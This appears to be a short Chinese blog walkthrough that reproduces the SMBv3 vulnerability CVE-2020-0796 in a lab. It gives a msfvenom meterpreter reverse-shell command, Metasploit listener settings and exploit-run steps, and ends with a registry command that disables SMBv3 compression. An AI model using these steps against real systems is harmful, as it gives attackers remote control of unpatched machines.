CVE-2020-0796 SMBv3漏洞复现过程

    科技2024-04-15  109

    1.扫描主机是否存在漏 扫描py文件链接

    2.下载可利用的POC poc地址

    3.在kali里使用msfvenom生成shell,lhost是攻击机ip

    msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.236.130 lport=4444 -f py -o exp.py

    4.将生成的shell替换poc文件夹里的exploit.py的USER_PAYLOAD,整个全部替换 5.进入msf开启监听

    use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp set lport 4444 set lhost 192.168.236.130 run

    6.运行exploit.py 7.查看监听是否收到 如果报错根据错误修改exploit.py的参数。

    修复建议: 禁用SMBv 3压缩,具体命令如下

    Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" DisableCompression -Type DWORD -Value 1 -Force

    Processed: 0.012, SQL: 9